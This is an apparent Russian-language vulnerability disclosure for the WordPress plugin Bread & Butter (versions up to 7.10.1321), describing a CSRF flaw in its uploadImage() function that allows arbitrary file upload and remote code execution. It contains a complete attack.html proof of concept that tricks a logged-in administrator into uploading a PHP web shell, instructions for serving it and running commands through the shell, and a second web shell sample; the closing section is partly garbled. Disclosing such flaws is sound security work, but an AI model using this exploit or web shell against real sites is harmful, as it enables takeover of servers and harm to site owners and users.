
Bread & Butter: ограничение контента + сбор лидов + сбор данных first-party + взращивание лидов с помощью ИИ-агентов <= 7.10.1321 — межсайтовая подделка запроса, приводящая к произвольной загрузке файлов
Плагин Bread & Butter IO содержит уязвимость в функциональности загрузки изображений, которая позволяет любому атакующему обманом заставить аутентифицированных администраторов загружать произвольные файлы на сервер, включая PHP-веб-шеллы, что приводит к удалённому выполнению кода (RCE). Уязвимость возникает из-за отсутствия CSRF-защиты в функции uploadImage(), что позволяет атакующим создавать вредоносные запросы, которые браузеры администраторов будут автоматически выполнять.
Уязвимость присутствует в функции uploadImage() в файле /bread-butter/src/Base/Ajax.php, в которой отсутствуют надлежащая проверка файлов и CSRF-защита; при этом используется file_put_contents() для записи файлов напрямую в каталог загрузок WordPress до выполнения каких-либо проверок безопасности.
Вот простой attack.html:
<!DOCTYPE html>
<html>
<body>
<button onclick="exploit()">CSRF Attack</button>
<script>
function exploit() {
const form = document.createElement('form');
form.action = 'http://TARGETSITE.COM/wp-admin/admin-ajax.php';
form.method = 'POST';
form.enctype = 'multipart/form-data';
form.target = '_blank';
form.style.display = 'none';
// Action field
const action = document.createElement('input');
action.name = 'action';
action.value = 'upload_image';
form.appendChild(action);
// File field
const file = document.createElement('input');
file.type = 'file';
file.name = 'file';
const blob = new Blob([`<?php system($_GET['cmd']); ?>`], { type: 'image/jpeg' });
const phpFile = new File([blob], 'test.php', { type: 'image/jpeg' });
const dt = new DataTransfer();
dt.items.add(phpFile);
file.files = dt.files;
form.appendChild(file);
document.body.appendChild(form);
form.submit();
}
</script>
</body>
</html>
Для POC вы можете запустить его локально примерно так:
# Serve the CSRF exploit
python3 -m http.server 1337
# Visit: http://localhost:1337/attack.html
# Click "CSRF Attack" button
# Check new tab for WordPress response
# Test uploaded shell: https://TARGETSITE.COM/wp-content/uploads/[year]/[month]/test.php?cmd=whoami
Если в браузере жертвы выполнен вход администратора, переход по ссылке приводит к RCE.
Уязвимость присутствует в функции uploadImage() в строке 411 файла /bread-butter/src/Base/Ajax.php:
public function uploadImage() {
$this->checkAdmin();
$file = $_FILES['file'];
$type = $file['type'];
$name = $file['name'];
$image_url = $file['tmp_name'];
$upload_dir = wp_upload_dir();
$image_data = file_get_contents($image_url);
$filename = basename($name);
if (wp_mkdir_p($upload_dir['path'])) {
$file = $upload_dir['path'] . '/' . $filename;
} else {
$file = $upload_dir['basedir'] . '/' . $filename;
}
file_put_contents($file, $image_data); // Attacker get's file moved to acessable storage!
// Post-upload processing (after vulnerability is exploited)
$wp_filetype = wp_check_filetype($filename, null);
// ... rest of function
}
Уязвимая функция регистрируется как AJAX-обработчик WordPress в строке 95:
add_action('wp_ajax_' . self::$uploadImage, array($this, 'uploadImage'));
Здесь self::$uploadImage определяется как upload_image в строке 37.
Единственным средством безопасности является метод checkAdmin() в строках 166-171:
public function checkAdmin() {
if (!current_user_can('manage_options')) {
echo 0;
wp_die();
}
}
Отсутствие CSRF-защиты делает эту уязвимость эксплуатируемой с помощью атак межсайтовой подделки запроса (CSRF). POC attack.html демонстрирует это следующим образом:
target="_blank" для обхода ограничений CORSattack.html)/wp-content/uploads/[year]/[month]/test.php?cmd=whoami/wp-admin/admin-ajax.php<?php
if(isset($_GET['cmd'])) {
system($_GET['cmd']);
} else {
echo "Shell ready. Use ?cmd=command";
}
?>
/wp-content/uploads/[year]/[month]/[filename].php